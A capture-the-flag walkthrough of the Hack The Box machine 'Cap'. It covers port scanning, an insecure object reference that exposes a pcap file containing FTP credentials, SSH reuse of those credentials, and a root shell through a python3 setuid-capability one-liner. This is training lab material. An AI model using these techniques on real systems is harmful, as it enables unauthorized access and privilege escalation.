HTB: CAP

CAP Badge

Machine IP: 10.10.10.233
System IP: 10.10.16.12

Network Mapper

nmap -T4 -A -p- -v -oN nmap.txt 10.129.152.19

which output the following

Nmap scan report for 10.129.152.19
Host is up (0.17s latency).
Not shown: 65525 closed ports
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp    open     http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|   
8670/tcp  filtered unknown
16329/tcp filtered unknown
21140/tcp filtered unknown
22392/tcp filtered unknown
23351/tcp filtered unknown
36340/tcp filtered unknown
59688/tcp filtered unknown

FTP

On ftp we tried doing anonymous login but no success

ftp 10.129.152.19
Connected to 10.129.152.19.
220 (vsFTPd 3.0.3)
Name (10.129.152.19:kevin): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.

Webserver

So we moved to website on port80

Home page on port 80

On some enumeration we find the section Security Snapshot (5 Second PCAP + Analysis) (http://10.129.152.19/capture)` http://10.129.152.19/data/xx

On analysis we found that it’s a pcap file with the captured network traffic but one of the abnormal stuff was that it was names 3.pcap or for you it could be 2.pcap so I thought can we retrieve 1.pcap and yes with burpsuit we can

Tampering using Burpsuit

So on checking the file with wireshark we found some interesting redable stuffs but nothing like passwords etc so again I went to download/check 0.pcap if it exists and yes it existed.

On analysis of 0.pcap with wireshark we found the ftp username and password

Captured credentials in 0.pcap

So lets login to ftp and we have the user.txt

Login to FTP

Note to download file over ftp use `get <filename>`

Now let’s see if we can login via ssh as user found above

ssh <user>@10.129.152.19

On running linpeas we get to know that we have setuid capability i.e. we can create a python3 script and use setuid to change the uid for that process.

Output of Linpeas

With little bit of googling I landed on this content rich blog on hacking articles.

So the steps will be to

which python3        //To check the path
cd /usr/bin/
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'  //to span bash

Root captured

And done, We’ll meet soon with another awesome writeup till then stay tuned and keep hacking.